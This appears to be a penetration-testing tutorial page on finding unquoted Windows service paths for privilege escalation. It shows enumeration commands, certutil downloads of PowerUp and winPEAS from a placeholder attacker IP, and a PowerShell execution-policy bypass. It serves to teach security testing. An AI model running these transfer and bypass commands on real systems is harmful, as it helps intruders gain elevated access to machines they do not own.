Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

HUNTING FOR UNQUOTED SERVICES MANUALLY

  1. The first thing we should check when we get a foothold is what privileges our current user has using 
    whoami /priv

    NOTE: The SeShutdown privilege allows restarting a machine, Typically, you might lack permissions to directly stop/start a service. However, with SeShutdown, you can restart the machine, indirectly restarting the service and facilitating exploitation,The SeShutdown privilege, even if marked "Disabled," can still be used because it's only disabled for the current session.

  2. We can manually hunt for any unquoted service paths on the system using cmd.
    wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """

    !

  3. We can manually hunt for any unquoted service paths on the system using Powershell.
    Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName

    NOTE: Both commands have found that the unquotedsvc service has an unquoted service path and that the Start-mode is an Manual service.

  4. To Check Service Path Configuration and if we have permissions to start service:
    sc sdshow unquotedsvc

HUNTING FOR UNQUOTED SERVICES WITH POWERUP

  1. If you don’t already PowerUp, you can get PowerUp.ps1 using the following command:
    wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

  2. Host the Powershell Script Using Python:
    python3 -m http.server 8000

  3. Transfer the script to the target machine using certutil:
    certutil -urlcache -f http://[IP-ADRESS]:8000/PowerUp.ps1 PowerUp.ps1

  4. To bypass the PowerShell execution policy and execute the PowerUp.ps1 in a single line:
    powershell -ep bypass -c "& {.\PowerUp.ps1}"

    NOTE: PowerUp.ps1 can enumerate misconfigurations and has built-in functions to exploit many of them. However, finding an unquoted service path doesn't always mean it's vulnerable. PowerUp recognizes the misconfiguration and suggests an AbuseFunction, assuming it is exploitable.

HUNTING FOR UNQUOTED SERVICES WITH WINPEAS

  1. Since the target runs a 64-bit OS, we can send 64-bit winPEAS via a Python HTTP server..
    python3 -m http.server 8000

  2. Transfer winPEAS to target machine Using certutil
    certutil -urlcache -f http://[IP-ADRESS]:8000/winPEASx64.exe winPEASx64.exe

  3. winPEAS has filters for the Services Information category to find unquoted service paths using:
    .\winPEASx64.exe quiet servicesinfo

    NOTE: Sharpen your eagle eye to quickly find important data in the winPEAS output by paying attention to the red and yellow highlighted sections.